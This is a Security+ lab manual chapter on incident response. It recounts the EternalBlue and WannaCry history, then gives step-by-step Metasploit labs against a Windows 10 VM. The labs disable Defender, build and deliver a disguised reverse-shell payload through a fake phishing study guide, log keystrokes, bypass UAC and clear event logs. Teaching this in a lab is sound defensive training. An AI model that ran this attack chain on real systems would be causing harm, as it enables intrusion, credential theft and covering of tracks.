The National Institute of Standards and Technology’s (NIST) Computer Security Resource Center (CSRC) provides the following as one of the definitions of incident (https://csrc.nist.gov/glossary/term/incident):

An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Furthermore, incident response is defined by the NIST CSRC as “the mitigation of violations of security policies and recommended practices” (https://csrc.nist.gov/glossary/term/incident_response).

Incident response includes steps that an organization takes right after a cyberattack or data breach to contain the damage and preserve the evidence for forensics analysis as best as possible. If not done correctly, the restoration and recovery of a system or network could cause even more damage. Therefore, having a special computer incident response team (CIRT), if possible, is highly advisable.

60 MINUTES

Lab Exercise 22.01: Incident Response Companies and Stories

The more a company is proactive with incident response, the more successful it will be. Anticipate not if, but when, you will be attacked, and the odds are better you’ll be able to contain the damage. Knowing about recent incidents and how other companies responded to them is crucial, as well.

Learning Objectives

In this lab exercise, you’ll explore the services and resources provided by multiple companies. At the end of this lab exercise, you’ll be able to

•   Understand how incident response is properly done

•   Be up to date on recent incident response stories

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   A web browser with an Internet connection

Let’s Do This!

Fire up a browser. You’re about to research incident response services from various companies.

1

Step 1 Lots of companies offer incident response services. Evaluate the following companies and write a report comparing the services offered:

•   Check Point

•   Cisco

•   Cylance

•   FireEye

•   IBM

•   McAfee

•   RSA

•   Secureworks

•   Symantec

•   Trustwave

When performing a Google search for these companies, enter the name of the company along with the phrase “incident response” in quotation marks.

In your report, address each of the following questions and anything else you feel is important:

•   What is offered by all companies?

•   What is unique to each?

•   What is the best part of each company’s service?

•   What is one thing that can be improved in each company’s service?

•   Which is the best overall package and why?

2

Step 2 SecurityIntelligence, by IBM Security, posts articles on “developing and testing an incident response plan, ransomware and other evolving threats and how regulations affect incident response.”

Pick five of the recent articles at https://securityintelligence.com/category/incident-response/ and write a paragraph summary for each.

60 MINUTES

Lab Exercise 22.02: Metasploit Framework

Seeing what might constitute an active incident would be a great way to understanding how incident response works and what would be involved in containing an incident. As you perform the steps in this lab exercise, imagine that you are not only the one carrying out the attack on offense, but you are also the person responsible for containing this attack on defense.

The word exploit is both a noun and a verb. The noun exploit means a small and focused program, set of data, or a sequence of commands that takes advantage of a vulnerability, causing unintended and unanticipated behavior. The verb exploit means to do it. You use an exploit (pronounced with emphasis on the first syllable, EXploit) to exploit (pronounced with emphasis on the second syllable, exPLOIT) a vulnerability.

A vulnerability is a weakness, a flaw, a gap, or a hole in an operating system, software, or hardware that provides a way into a system or network for the attackers. A weak password, susceptibility to buffer overflows, and susceptibility to SQL injection attacks (covered in Chapter 19) are all examples of vulnerabilities.

How do these vulnerabilities come to light? Who discovers them? From the black hat camp, malicious evil attackers do. From the white hat camp, security researchers do. Both sides spend day in and day out poking and prodding operating systems, software, and hardware. Black hat hackers, in the event that they’re caught, go to prison. White hat hackers, who do the same things that black hat hackers do, but with explicit permission from system/network owners, get paid, have thrilling careers, and are held in high regard in the cybersecurity community. White hat hackers, also known as pentesters, penetration testers, and ethical hackers, are hired by companies to find and exploit vulnerabilities so that the vulnerabilities can be identified and fixed before they are discovered by black hat hackers.

Cross Reference

The Introduction of this book discusses the origin and evolution of the term hacker, as well as another type of hacker: gray hat hackers.

Some vulnerabilities are labeled zero-day. These are vulnerabilities that are discovered but not publicly announced before being exploited. Therefore, the companies and individuals who would normally patch the vulnerabilities now have zero days to fix the problems or suggest mitigation techniques. Zero-day exploits (also known as zero-day attacks) aren’t used against a large number of targets because an increase in usage will trigger discovery and subsequent detection signatures (by anti-malware programs and IDS/IPS devices) and patches by vendors. A zero-day won’t be a zero-day if used too often! Therefore, attackers stockpile them and use them in certain “emergency” situations. Governments can stockpile them, too, instead of notifying vendors whose devices and software protect their own citizens. Such a stockpile of zero-days would be very valuable for reconnaissance and cyberattacks against nation-state cybercriminals. However, bad things can happen as a result.

Such was the case for the WannaCry ransomware outbreak on Friday, May 12, 2017, that propagated with the EternalBlue zero-day exploit for the Microsoft Windows Server Message Block (SMB) protocol. EternalBlue was part of a set of tools developed by the Advanced Persistent Threat (APT) known as the Equation Group. The Equation Group is believed to be tied to the National Security Agency (NSA) hacking group known as Tailored Access Operations (TAO). Essentially, the NSA created, used, and refined the EternalBlue exploit for at least five years, from 2011 through 2016. Three former NSA operators claimed that analysts spent nearly a year finding a flaw in Microsoft’s software and writing the code to exploit it. The NSA did not alert Microsoft about the vulnerability, but instead used it in offensive attacks, intelligence gathering, and counterterrorism missions.

SMB is a network file sharing protocol that allows applications on a computer to read and write to files and to request services. It also allows for network browsing and network printing. The vulnerability can be exploited because the SMB Version 1 (SMBv1) server, in some versions of Microsoft Windows, mishandles specially crafted packets from remote attackers, which allows them to execute arbitrary code on a target computer.

In August 2016, a hacking group calling itself the Shadow Brokers announced that it had stolen malware code from the Equation Group. In January 2017, when the NSA discovered that the EternalBlue exploit had been stolen and was about to leak into the public domain, they finally notified Microsoft. In February 2017, Microsoft delayed its regular release of security patches because they were hard at work writing fixes for EternalBlue. In March 2017, Microsoft put out security bulletin MS17-010, with patches for all supported versions of Windows operating systems at the time. These patches killed off the SMB vulnerability, rendering EternalBlue dead on systems that were patched. In April 2017, the Shadow Brokers dumped an NSA toolkit of cyberweapons, including EternalBlue, giving anyone access to these exploit tools. The problem, of course, was that many individuals and companies ignored the Microsoft patches in March, and on May 12, 2017, found their systems locked and encrypted with a ransom demand.

200,000 computers were infected in 150 countries. The biggest impacts were felt in Russia, Ukraine, India, and Taiwan. Major telecommunication companies in Spain were affected. Lots of National Health Service (NHS) hospitals in England and Scotland told noncritical accident and emergency patients to stay away, as over 70,000 devices were locked and encrypted, including computers, MRI scanners, and blood storage refrigerators. Critical patients had to be moved to other facilities. Companies all over told their employees to shut down and unplug their machines. The ransomware locked the machines, encrypted files, and demanded nearly $600 in Bitcoin for a decryption key. At the time, nearly 90% of care facilities in the U.K.’s NHS were still using Windows XP, an almost 16-year-old operating system at that point. Overall, the Windows XP market share was around 7% in May 2017, and that’s a really huge number considering that Microsoft stopped supporting Windows XP in April 2014.

Within 24 hours of the WannaCry outbreak, Microsoft did something really strange and unprecedented by issuing emergency patches for unsupported operating systems, including Windows XP, Windows Server 2003, and Windows 8, to foil the ransomware. Then in June 2017, Microsoft issued more patches for the unsupported OSes to clean up vulnerabilities that could be attacked with the Shadow Brokers exploits, as well as older issues, a few going back as far as nine years, that could still be exploited.

Not too long after the WannaCry outbreak began, a 22-year-old web security researcher from England, who goes by the handle MalwareTech, found the kill switch in the ransomware, which was activated by registering a domain name found in the code. MalwareTech reverse engineered WannaCry and saw that it checked to see if a gibberish URL led to an active web page. Out of curiosity, he registered that domain himself for $10.69. Once the malware found the URL to be live, it shut down. This pretty much halted the initial outbreak, but new versions without the kill switches were subsequently detected. It took about a day before MalwareTech was doxed by U.K. tabloids and identified, against his will, as Marcus Hutchins.

Note

The WannaCry hero, Marcus Hutchins, was in the news again when he was arrested on August 3, 2017, charged with creating and selling malware that stole online banking information. The amazing story behind that, and what came before and after, is detailed at www.wired.com/story/confessions-marcus-hutchins-hacker-who-saved-the-internet.

Researchers also discovered ways to recover data from machines infected by WannaCry under certain circumstances. In a shocking twist, antivirus provider Kaspersky Lab concluded that 98% of the victims were actually running Windows 7, and the number of infected Windows XP machines was insignificant. However, upgrading and patching are still the lessons to be learned. Incredibly enough, EternalBlue was used again on June 27, 2017, as part of the NotPetya cyberattack, which also targeted unpatched systems.

A 1-day (a delay of 1 day since disclosure) or N-day (a delay of a certain number of days since disclosure) is actually more damaging than a zero-day. Responsible disclosure is a model that allows a vendor a certain number of days to patch the vulnerability before the vulnerability is reported to the public by an ethical hacker. Simply ignoring these vulnerabilities would be security through obscurity (and they likely would be uncovered by a black hat hacker at some point anyway), so ethical hackers feel a social responsibility for disclosure. For example, for Google’s Project Zero, security analysts wait 90 days after telling vendors about vulnerabilities for public disclosure, or immediately when a patch is released before the 90-day period. A system called Common Vulnerabilities and Exposures (CVE) references vulnerabilities and exposures, which allows for easy sharing of information across different databases and tools and provides a baseline for an organization’s coverage from their tools.

When vulnerabilities are publicly disclosed without a patch in place, a race begins between attackers (who didn’t know about the vulnerability until then) creating exploits for the vulnerabilities and the vendors putting out security patches. As such, there is an increase of exploitation once the vulnerability is disclosed, which over time decreases once a security patch is released and installed by more and more individuals and organizations. However, the likelihood of an unpatched system getting exploited changes from likely to probable. For high-value targets, the likelihood changes from probable to inevitable. According to the article at https://securityboulevard.com/2020/06/why-it-takes-10x-longer-to-patch-than-it-does-to-exploit/, it takes ten times longer to patch than it does to exploit.

If the vulnerability is disclosed with an already developed patch in place, there will still be many targets for attackers to exploit. Not all individuals and companies are diligent in applying updates and patches (as proven with the WannaCry story). A patch could be silently/automatically pushed out if the vendor knew about the vulnerability before it was disclosed, or explicitly, which requires manual installation. Furthermore, it’s a best practice for organizations to test patches before deploying them, as blindly deploying patches can cause other problems in an enterprise environment and break things. Patch testing can cause a delay, of course, and in that timeframe a vulnerability can easily be exploited. Studies have actually shown that the exploits with the most success are older ones that haven’t been patched.

Even scarier, according to a 2020 study (https://unit42.paloaltonetworks.com/state-of-exploit-development/), an exploit for a vulnerability is published 37 days after a patch is released, and the risk of a vulnerability being exploited increases quickly after a patch is released. That means attackers can know, due to a patch, that there is a vulnerability waiting to be exploited and write an exploit based on the patch description. Now anyone has access to that exploit and can use it against targets! Furthermore, for patches that have minimal information disclosed (to possibly thwart exploit development), attackers can compare a patched version to an unpatched version of code, reverse it, design an exploit based on the patch itself, and now exploit vulnerable systems that haven’t had the patch applied.

Finally, there are proof-of-concept (PoC) exploits, often developed by white hat hackers and vendors themselves to show how a vulnerability can be exploited and to develop a patch. Generally, these are not meant to cause damage, but they can be turned around, refined, and used by black hat hackers, especially for unpatched vulnerabilities.

Exploits usually deliver a payload to a system under attack, to allow the attacker to penetrate the system. Payload is the actual code that allows attackers to control systems after they’ve been exploited.

Imagine two burglars driving in a van. The driver rams the van into a storefront. The other guy jumps out and starts looting the store. The van would be the exploit, and the burglar filling his bags would be the payload.

Think of a missile—the rocket, fuel, and everything else in the rocket is the exploit. The warhead is what does the actual damage—that’s the payload. Take out the warhead, and the missile doesn’t have a strong impact. Furthermore, a warhead without being delivered by a rocket won’t do much either.

Penetration testing, or simply pentesting, is very similar to a cyberattack by a black hat hacker. First, you find systems (as shown in this chapter). Next, you find programs or services on those systems (as shown in Chapter 16, through port scanning). Then, you find vulnerabilities in those programs or services on those systems (as shown in Chapter 25). Then, you find ways that those vulnerabilities can be exploited (as shown in this chapter). Finally, you go ahead and actually exploit those vulnerabilities (as shown in this chapter). Now that you’ve compromised systems, you can use them to pivot to other systems on the same network as well as systems on different networks.

Learning Objectives

In this lab exercise, you’ll attack a Windows 10 system. At the end of this lab exercise, you’ll be able to

•   Use Metasploit to exploit a vulnerability to gain control of a Windows 10 system

•   Understand what an active incident looks like to gain a better idea of what might be needed to contain it

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   The Windows 10 VM you created in Chapter 1

•   The Kali Linux VM you created in Chapter 1

Let’s Do This!

Real-time protection must be turned off on the Windows 10 VM for this lab exercise to work correctly.

Turn off Real-time Protection on the Windows 10 VM by following these steps:

1.   Click the Start button or in the search box and enter Security.

2.   Click Windows Security.

3.   Click Virus & Threat Protection.

4.   Click Manage Settings under Virus & Threat Protection Settings.

5.   Under Real-time Protection, click the button to turn it off.

6.   Click the Yes button in the popup asking if you want to allow this app to make changes to your device.

7.   Click the X in the upper-right corner of the window to close it.

In this lab exercise, you will use these tools that come with Kali Linux:

•   Metasploit Framework Contains a large public database and framework of over 2,000 quality-assured exploits and close to 600 payloads, which certainly explains its name. Metasploit also contains nearly 50 encoders, which are used to transform the payload to fool anti-malware software, firewalls, intrusion detection systems (IDSs) and intrusion prevention systems (IPSs), as well as remove bad characters that would crash a target program or system.

•   MSFvenom Combines payload generation and encoding.

•   MSFconsole The most popular interface to the Metasploit Framework. MSFconsole is an all-in-one centralized console to work from.

•   PostgreSQL (pronounced post-gres-Q-L) An open-source relational database management system (RDBMS) used by Metasploit.

•   Meterpreter Metasploit’s most popular payload. Meterpreter allows you to do many things on the victim machine, including uploading, downloading, creating, modifying, and deleting files, taking screenshots, watching the victim machine live, taking over the screen, mouse, and keyboard, turning on a webcam, and much more.

In the following steps, be sure to press ENTER after each command.

1a–1d

Step 1 Open a terminal in your Kali Linux VM. Create an executable file with a Meterpreter payload, start a web server, and copy the executable file to the root directory of the web server.

a.   First, use MSFvenom to generate a 64-bit Windows executable file that implements a reverse TCP shell, Meterpreter, for the payload.

You’ll recall from Chapter 16 that a bind shell is created from the attacker’s machine directly to the victim’s machine, and it allows the attacker to execute commands on the victim’s machine. Firewalls and Network Address Translation (NAT) can get in the way of bind shells. Therefore, pentesters and attackers might decide to use a reverse shell, which goes in the other direction. It’s a connection initiated from the inside victim’s machine directly to the outside attacker’s machine. This also comes in handy when an attacker strategically “drops” a USB drive in a company’s parking lot and waits for an employee to plug it in. The attacker doesn’t know how the networking is set up, but that victim machine will run something on the USB that creates a reverse shell to the attacker’s machine, regardless of IP address, NAT, and firewall.

Enter the IP address of your Kali Linux VM in place of the IP address listed for LHOST (this is one single command; do not press ENTER after the first line):

sudo msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows
-f exe LHOST=192.168.1.114 LPORT=14618 -o ~/Desktop/WeissmanStudyGuide.exe

Put in your password when prompted now and when prompted throughout the chapter.

To understand this command, enter

msfvenom -h

for the help screen.

The -p option specifies the payload. The -a option specifies the architecture of the victim machine. The --platform option specifies the platform of the payload. LHOST specifies the IP address of local host (the attacking system). LPORT specifies the local port listening for the incoming connection from the victim machine. The -o option specifies the path and name of the output file.

The output will look like this (your path will be different per your user account):

No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /home/jonathan/Desktop/WeissmanStudyGuide.exe

b.   Start the Apache web server, officially known as the Apache HTTP Server, which comes with Kali Linux. Then verify that it’s started. Toward the top of the output, you should see “Active: active (running)” if Apache started successfully (note that the “2” after the name in the commands represents version 2 of the server). Press q to quit the status screen.

sudo service apache2 start
sudo service apache2 status

c.   From the (soon-to-be) victim Windows 10 system, open up a browser, enter in the IP address of your Kali Linux VM in the address bar, and press ENTER. You should see the “Apache2 Debian Default Page” now that the web server has been started.

d.   Back in the Kali Linux VM, enter

sudo cp ~/Desktop/WeissmanStudyGuide.exe /var/www/html

to copy the malicious WeissmanStudyGuide.exe file from the Desktop directory, where the file was created in Step 1a to the root directory of the web server.

2a–2c

Step 2 Start the database server, create and initialize the Metasploit Framework database, start Metasploit, and launch MSFconsole.

a.   In the Kali Linux VM, open up a terminal and start the PostgreSQL database server:

sudo /etc/init.d/postgresql start

b.   Create and initialize the Metasploit Framework database with the following command:

sudo msfdb init

You might see information messages that the database is already started and appears to be already configured. You might also see a message about Python backward compatibility.

You’ll only enter this command the first time you go through these steps. Subsequently, use

sudo msfdb start

to start Metasploit.

You might see an information message that the database is already started.

c.   Launch MSFconsole:

sudo msfconsole

After a moment, you’ll see the msf prompt. You will see different welcome text in MSFconsole each time you open it, with great puns and text graphics, as shown in Figure 22-1.

FIGURE 22-1 Welcome to Metasploit!

You might see a message about deprecated pg constants.

All commands will now be entered in the MSFconsole environment, as you are no longer in the Z shell. Notice the prompt that has the letters msf, followed by the version number, followed by the > symbol. Figure 22-1 was made when Kali Linux 2020.2 and msf5 were current.

3a–3d

Step 3 Explore Metasploit exploits.

a.   Enter the following to see all the exploits associated with Server Message Block (SMB), a protocol used for sharing files, printers, serial ports, and communications abstractions. There have been many attacks against SMB over the years—most notably, the May 2017 WannaCry ransomware attack, which used the EternalBlue exploit.

search smb

b.   Enter the following to see the different versions of the EternalBlue exploit and related exploits:

search eternalblue

c.   Enter the following to see more information on the EternalBlue exploit:

info exploit/windows/smb/ms17_010_eternalblue

d.   One of the most famous and earliest exploits against SMB was ms_08_067_netapi. Take a look at information related to that notorious exploit by entering the following two commands into Metasploit (press ENTER after each command):

search ms08_067_netapi
info exploit/windows/smb/ms08_067_netapi

The naming convention for these exploits is “ms” for Microsoft, followed by the year in which the exploit was discovered (2017 and 2008, respectively, for the exploits in this step), followed by the number of exploit it was for that year (10 and 67, respectively, for the exploits in this step), followed by a descriptive, relevant name.

Now take a look at another oldie but goodie by entering the following two commands:

search exploit/windows/dcerpc/ms03_026_dcom
info exploit/windows/dcerpc/ms03_026_dcom

4a–4f

Step 4 Configure an exploit and payload and then launch the exploit. This exercise was written when MSFconsole was in version 6; your prompt may have a different number after msf throughout this exercise.

a.   At the msf6 > prompt, enter

use multi/handler

which instructs Metasploit to use this generic payload handler exploit module. This allows the running of a stand-alone payload, which is simply a payload without an exploit. The stand-alone payload you created earlier with MSFvenom was the reverse TCP shell, Meterpreter, and this multi/handler module will catch the shell.

b.   At the msf6 exploit(multi/handler) > prompt, enter

set payload windows/x64/meterpreter/reverse_tcp

You’ll receive the following output confirmation:

payload => windows/x64/meterpreter/reverse_tcp

This gets the ball rolling in using the reverse TCP shell stand-alone payload, Meterpreter, created earlier with MSFvenom.

c.   At the msf6 exploit(multi/handler) > prompt, enter

set LHOST <IP Address of Kali Linux VM>

For example, enter

set LHOST 192.168.1.114

where the IP address represents the IP address of your Kali Linux VM.

You’ll receive the following output confirmation:

LHOST => 192.168.1.114

This specifies your IP address as the local host for this exploit module, matching the IP address configured for the payload with MSFvenom.

d.   At the msf6 exploit(multi/handler) > prompt, enter

set LPORT 14618

to set the local port that will listen for incoming traffic from the victim machine. Use my choice of 14618. This specifies 14618 as the local port for this exploit module, matching the port configured for the payload with MSFvenom.

You’ll receive the following output confirmation:

LPORT => 14618

e.   At the msf6 exploit(multi/handler) > prompt, enter

show options

to see information about the payload and exploit.

f.   At the msf6 exploit(multi/handler) > prompt, enter

exploit

to start the magic!

You’ll see output similar to the following (with your IP address instead):

[*] Started reverse TCP handler on 192.168.1.114:14618

5a–5d

Step 5 Simulate a victim falling for a phishing attack by downloading and running a malicious file, which will launch the exploit you created earlier.

a.   Let’s imagine you receive an e-mail stating that Professor Weissman’s Study Guide offers you a 100 percent guarantee of passing the CompTIA Security+ certification. Wait, it gets even better. All you have to do is click a link and get it for free!

Open up Firefox on the victim machine (Chrome will block the file you’re going to download now and not even give you an opportunity to override its decision). In the address bar, enter http://<IP address of your Kali Linux VM>/WeissmanStudyGuide.exe and press ENTER.

For example, enter the following:
http://192.168.1.114/WeissmanStudyGuide.exe

Be sure to use uppercase and lowercase letters for the file, as shown.

In the dialog box that follows, click the Save File button.

b.   In the Downloads folder, double-click WeissmanStudyGuide.exe to launch it.

c.   You’ll see the Windows Protected Your PC window, which states, “Microsoft Defender SmartScreen prevented an unrecognized app from starting. Running this app might put your PC at risk.”

It’s likely that users have seen this message many times for legitimate programs, and as a result, they have become desensitized to it. Therefore, letting their security down is not even given a second thought.

Don’t click the Don’t Run button at the bottom right; instead, click the More Info hyperlink at the top.

You’ll see the following:

App: WeissmanStudyGuide.exe

Publisher: Unknown publisher

Click the Run Anyway button at the bottom.

d.   In the Kali Linux VM, you’ll notice under the msf6 exploit(multi/handler) > exploit prompt (with your IP addresses) that you are in business, as shown here:

[*] Started reverse TCP handler on 192.168.1.114:14618
[*] Sending stage (201283 bytes) to 192.168.1.121
[*] Meterpreter session 1 opened (192.168.1.114:14618 -> 192.168.1.121:49884)
at 2020-08-14 15:56:49 -0400

meterpreter >

The next lab exercise picks up at this exact point. If you are not continuing at this time, you’ll have to reestablish the Meterpreter shell before starting the next lab exercise. Therefore, it’s highly recommended that you continue with the next lab exercise now.

60 MINUTES

Lab Exercise 22.03: Metasploit’s Meterpreter

Time to use a stealthy, powerful, and extensible payload, Meterpreter, described in the “Let’s Do This” section of the previous lab exercise and at https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/.

Learning Objectives

In this lab exercise, you’ll continue where you left off in the previous lab exercise and use Metasploit’s Meterpreter payload. At the end of this lab exercise, you’ll be able to

•   Perform an attack on a Windows 10 system

•   Understand how parts of the attack relate to incident response

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   The Windows 10 VM you created in Chapter 1

•   The Kali Linux VM you created in Chapter 1

•   The previous lab exercise completed with machines in the state they were at the end of the exercise

Let’s Do This!

If you are not continuing this lab exercise right after the previous one, power on the Windows 10 VM and the Kali Linux VM.

If your Kali Linux VM is using a different IP address now, you must generate a new payload with MSFvenom, copy it to the root directory of the web server, and download it from the Windows 10 VM. You might as well just go through the entire previous lab exercise again and then continue here.

If your Kali Linux VM is using the same IP address as before, there is no need to generate a new payload with MSFvenom, nor is there a need to redownload the WeissmanStudyGuide.exe file (unless it was deleted) from the Windows 10 VM.

On the Kali Linux VM, restart the Apache web server, launch MSFconsole, and enter the following commands from the previous lab exercise to get back to a Meterpreter shell:

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <IP address of your Kali Linux VM>
set LPORT 14618
exploit

From the Windows 10 VM, make sure that Real-time Protection is off (it turns itself back on, so if it did, turn it off again) and then double-click the WeissmanStudyGuide.exe file to launch it. You should once again see a Meterpreter shell in the Kali Linux VM.

Now it’s time to see what Meterpreter is all about.

1a–1g

Step 1 Explore Meterpreter commands for gaining insight and performing actions on the victim machine.

a.   Start by getting information on the compromised system and its drives:

sysinfo

b.   To see the amount of time that has elapsed since someone used the keyboard of the compromised system (letting you know if someone might respond to this incident right away), enter

idletime

c.   To see a list of every running process on the compromised system, enter

ps

d.   Open up Notepad on the Windows 10 VM. From Meterpreter, enter

ps | notepad

to see information about the process.

Then enter

pkill notepad

…and, poof, it’s gone!

Imagine if the user of the victim machine was watching their screen at the time a program was closed like this. That user would be able to detect and respond to this incident. Also imagine if the program being closed was a program that was more significant than Notepad.

e.   To see a list of all Meterpreter commands, enter

help

f.   Let’s pick one that sounds very tantalizing:

screenshot

You’ll notice a message such as the following:

Screenshot saved to: /home/jonathan/owTKbzwo.jpeg

Click the Kali Linux icon in the upper-left corner of the window. In the pane on the right, select File Manager. The window should automatically open to your home directory. Find the image with the matching name seen in Meterpreter and double-click the image to open it up. You’ll see the desktop of the victim machine when you snapped the screenshot.

g.   Now only one thing can really top that, right? This time enter

screenshare

You might see a message stating “Running Firefox as root in a regular user’s session is not supported.” If so, go back to the File Manager window you opened from the previous step and double-click a file with a globe icon, a randomly constructed filename, and an .html extension.

Now you’ll be able to watch the victim machine in real time.

Perform some activities in the Windows 10 VM and watch those actions mirrored in the window for the Metasploit screenshare.

Close the tab when you’re done and press CTRL-C in the Meterpreter CLI window to return to the Meterpreter shell.

2a–2g

Step 2 Capture keystrokes from the victim machine through Meterpreter.

a.   It would be helpful for an attacker to capture keystrokes on a victim machine, which could include username/password combinations and the websites those credentials are used on. Keystroke logging could also capture sensitive information typed into a document or e-mail, even if at the last minute the file or e-mail is discarded and not saved or sent. Other URLs and names of programs or files can also be captured and used nefariously.

In the Meterpreter shell, enter

keyscan_start

to start the keystroke sniffer.

b.   On the Windows 10 VM, open up Notepad and start typing a couple of paragraphs of anything. Be sure to use the arrow keys, BACKSPACE, and DELETE.

c.   On the Windows 10 VM, open up any browser and go to www.chase.com.

Note

Throughout this step, you will not be able to sign in with any of the username/password combinations. They are provided to illustrate the keystroke-logging process.

Enter a username of bob and a password of bobpassword in the corresponding textboxes and click the blue Sign In button.

d.   Go to https://mycourses.rit.edu.

Click the RIT Account Login button, enter a username of bob2 and a password of bobpassword2, and click the Log In button.

e.   Go to https://lms.flcc.edu.

Click the OK button on the Privacy, Cookies And Terms Of Use popup, enter a username of bob3 and a password of bobpassword3 in the corresponding textboxes, and click the Login button.

f.   Go to https://mail.google.com.

Enter an e-mail address of [email protected] or anything else that gets recognized by Gmail, click the Next button, and then enter a 20-character password using multiple character sets. Click the Next button.

g.   Click the Start button or in the search box, type Paint, and click Paint.

h.   Back in Meterpreter on the Kali Linux VM, enter

keyscan_dump

This will dump every keystroke since you initiated the keyscan_start command to the screen.

Imagine if the user of the victim machine typed an angry letter, only to reconsider and delete it. You’d have it! You might have parts of a document that were subsequently deleted or changed. You’d also have any password that was entered (and protected with TLS in transit) regardless of length and complexity, and regardless of the strong hash format it might be stored with on the authenticating system.

i.   Enter

keyscan_stop

to stop scanning keystrokes.

3a–3f

Step 3 Explore the Meterpreter networking-related commands that can get information and send traffic from the victim machine.

a.   Take a look at the Meterpreter help again, and you’ll notice a section full of networking commands. Try these commands:

arp
ifconfig
ipconfig
netstat
route

You’ll notice the outputs for ifconfig and ipconfig are the same, and that the outputs look different than when those tables are viewed from a Windows command prompt. However, getting to a Windows command prompt from Meterpreter is simple.

b.   From Meterpreter, open a command prompt from the compromised machine with the following command:

shell

c.   Now you can execute networking commands as if you were physically in front of the compromised machine.

See the machine’s ARP cache with

arp -a

d.   See the machine’s network configuration with

ipconfig /all

e.   See the machine’s DNS resolver cache with

ipconfig /displaydns

f.   Clear the machine’s DNS resolver cache with

ipconfig /flushdns

Verify that the entries are gone by executing

ipconfig /displaydns

again. This could be useful for a DNS cache poisoning attack (covered in Chapter 7).

g.   The victim machine can be leveraged by the attacker to be an attacking machine, as the attacker can now willfully send traffic from the victim machine to anywhere.

If you didn’t perform the lab exercises of Chapters 15 or 16, which included installing Wireshark on the Windows 10 VM, install Wireshark now by going to https://www.wireshark.org, clicking in the circle above Download, clicking Windows Installer (64-bit), clicking the Save File button, and then double-clicking the installer in the Downloads folder when the download completes. Accept all default settings.

Open up Wireshark and start sniffing on the Ethernet0 interface with a display filter of icmp.

From Meterpreter, send continuous pings from the victim machine with

ping -t 8.8.8.8

You’ll notice the traffic in Wireshark on the victim machine.

The victim machine can be used in a botnet in this fashion as part of a distributed denial-of-service (DDoS) attack. Stop the pings in Meterpreter by pressing CTRL-C and then typing y and pressing ENTER.

h.   Go back to the Windows command prompt by entering

shell

again. Now enter

powershell

and, amazingly enough, you have a PowerShell interface. Chapter 20 provides lab exercises featuring PowerShell attacks, including fileless malware. All of those attacks can now be performed directly by the attacker on the victim machine.

Type exit and press ENTER, and then type exit and press ENTER again to go back to the Meterpreter shell.

4a–4i

Step 4 For this step, watch on the Windows 10 VM as you execute the commands from Meterpreter on the Kali Linux VM. Meterpreter should be, by default, in the Downloads folder, since that’s where the exploit was launched. Each command will be outputted back to the screen.

Explore Meterpreter file- and directory management–related commands on the victim machine.

a.   From Meterpreter, launch a Windows command prompt again with the command shell. Make a directory on the victim machine with

md ransomware

b.   Verify that it was created by generating a directory listing with

dir

You’ll notice the name of the ransomware directory in the output.

c.   Change directories into the ransomware directory with

cd ransomware

d.   Create a text file named warning.txt and redirect the output string of an echo command to that file as follows:

echo If you don't pay, your encrypted files will be deleted! > warning.txt

From the Windows 10 VM, open up the file using Windows Explorer (just to see it) and then close it. Then go back to the Kali Linux VM and continue from the shell in which you’ve been executing these commands.

e.   Display the contents of the file with

type warning.txt

f.   Delete the file with

del warning.txt

g.   Change directories up one level with

cd ..

h.   Remove the ransomware directory with

rd ransomware

i.   Verify that the ransomware directory is gone with

dir

You’ll notice the name of the ransomware directory is no longer in the output.

Imagine the possibilities of what an attacker would be able to do with direct access to the file system on a victim machine!

Enter exit to return to Meterpreter.

5a–5e

Step 5 The current Metasploit session does not have full control over the victim machine because of the User Account Control (UAC) settings on Windows 10, which present a dialog box before important changes are made to the operating system. This ensures that an administrator’s approval is given before changes can be made by applications, users, and especially malware. In this step, you’ll bypass the UAC and perform administrative tasks on the victim machine with a second exploit. Pentesters and attackers often have to escalate privileges to go further from where they start off at when exploiting a machine.

a.   In Meterpreter, enter

clearev

which will try to clear the Event Viewer logs. It won’t work, and you’ll get an error message due to the UAC settings.

b.   This restriction is only temporary. You can bypass the UAC with the following sequence of commands.

Enter

background

in the Meterpreter shell. This puts the current Meterpreter session on hold in the background and brings you back to the msf6 exploit(multi/handler) > prompt. Notice the background session number at the end of the output.

At the msf6 exploit(multi/handler) > prompt, enter

use exploit/windows/local/bypassuac_fodhelper

This is a new exploit you’re going to unleash on the already hijacked Windows 10 system.

At the msf6 exploit(windows/local/bypassuac_fodhelper) > prompt, enter

sessions -i

to get the session ID (which matches what you saw at the end of the output from the background command). Then use that number in the following command. Mine, for example, is 1:

set session 1

This brings the session you put in the background back to the foreground.

At the msf6 exploit(windows/local/bypassuac_fodhelper) > prompt, enter

exploit

This unleashes the new exploit at the already hijacked Windows 10 system.

This sequence of commands hijacks a registry key and inserts a command that will be executed when C:WindowsSystem32fodhelper.exe runs. The binary fodhelper.exe (fod stands for “Features on Demand”) launches the Optional Features window when you click Optional Features from the Apps & Features Settings window. You can double-click C:WindowsSystem32fodhelper.exe to see the window that it launches. This trusted binary doesn’t show a UAC window when it runs, nor does it show a UAC window when other processes spawn from it. Thus, fodhelper.exe will be called, and based on a registry key entry modification, when fodhelper.exe runs, a second shell will spawn with the UAC flag off. This gives Meterpreter the privileges it needs. The modification to the registry key will be reverted after the payload runs to allow this change to be temporary and prevent detection.

c.   Pentesters and attackers want to cover their tracks, which is logically the last step in any attack. In the Windows 10 VM, right-click Start and select My Computer | Manage | System Tools | Event Viewer. Expand Windows Logs and examine the information it contains for the Application, Security, and System log entries.

d.   In Meterpreter, enter

clearev

Now it works! The log entries on the Windows 10 VM will disappear.

e.   Check out the logs in Event Viewer again. Quite a difference!

You will notice that the Security and System logs both contain a log entry that indicates those logs were cleared, which screams to systems administrators that a cyberattack happened. However, what happened is not clear; thus, this is a great form of covering tracks.

6a–6f

Step 6 The command-line interface (CLI) access is great, but imagine what you’d be able to do with a graphical user interface (GUI). You’ll find out now with Remote Desktop Protocol.

